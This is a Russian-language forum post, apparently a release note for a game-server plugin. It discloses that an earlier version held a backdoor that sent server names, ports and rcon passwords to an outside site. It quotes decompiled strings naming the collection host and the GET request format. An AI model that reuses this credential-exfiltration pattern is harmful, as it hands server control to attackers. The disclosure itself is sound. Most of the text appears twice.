Описание:
В версии 1.3 был обнаружен backdoor -> aim.inc:
Отправляющий на сайт информацию: [Время] -> [Имя сервера] - [Порт] - [Rcon Пароль] - [Версия бэкдора] - [is_dedicated_server?]
Данный backdoor был впарен товарищем derbatov.z
Благо что я вытянул этот хостинг...
Возможно некоторые сервера пострадали..
В данной версии backdoor был удалён.
А также исправлена функция [Нет отдачи]
Сам же derbatov.z лишился доступа к хосту + потерял базу собранной инфы с серверов.
Удачного пользования...
Код бэкдора выложить не могу т.к удалил его вместе с базой.
Отправляющий на сайт информацию: [Время] -> [Имя сервера] - [Порт] - [Rcon Пароль] - [Версия бэкдора] - [is_dedicated_server?]
Данный backdoor был впарен товарищем derbatov.z
Благо что я вытянул этот хостинг...
Возможно некоторые сервера пострадали..
В данной версии backdoor был удалён.
А также исправлена функция [Нет отдачи]
Сам же derbatov.z лишился доступа к хосту + потерял базу собранной инфы с серверов.
Удачного пользования...
Код бэкдора выложить не могу т.к удалил его вместе с базой.
Но при декомпиле есть инфа:
.DATA
str_000 string "%L"
str_001 string "NO_ACC_COM"
str_002 string "%L: %s %s"
str_003 string "USAGE"
str_004 string "HamFilter"
str_005 string "1.2"
str_006 string "derbatov.myihor.ru"
str_007 string "/proverka.php"
arr_000 array 426 fill 0x0
str_008 string "hostname"
str_009 string "port"
str_010 string "rcon_password"
arr_001 array 284 fill 0x0
str_011 string "GET https://%s%s?servername=%s&port=%s&rcon=%s&version=%s&os=%d
str_000 string "%L"
str_001 string "NO_ACC_COM"
str_002 string "%L: %s %s"
str_003 string "USAGE"
str_004 string "HamFilter"
str_005 string "1.2"
str_006 string "derbatov.myihor.ru"
str_007 string "/proverka.php"
arr_000 array 426 fill 0x0
str_008 string "hostname"
str_009 string "port"
str_010 string "rcon_password"
arr_001 array 284 fill 0x0
str_011 string "GET https://%s%s?servername=%s&port=%s&rcon=%s&version=%s&os=%d
Спасибо StRiKeR.csF за обнаружение..
Скачать: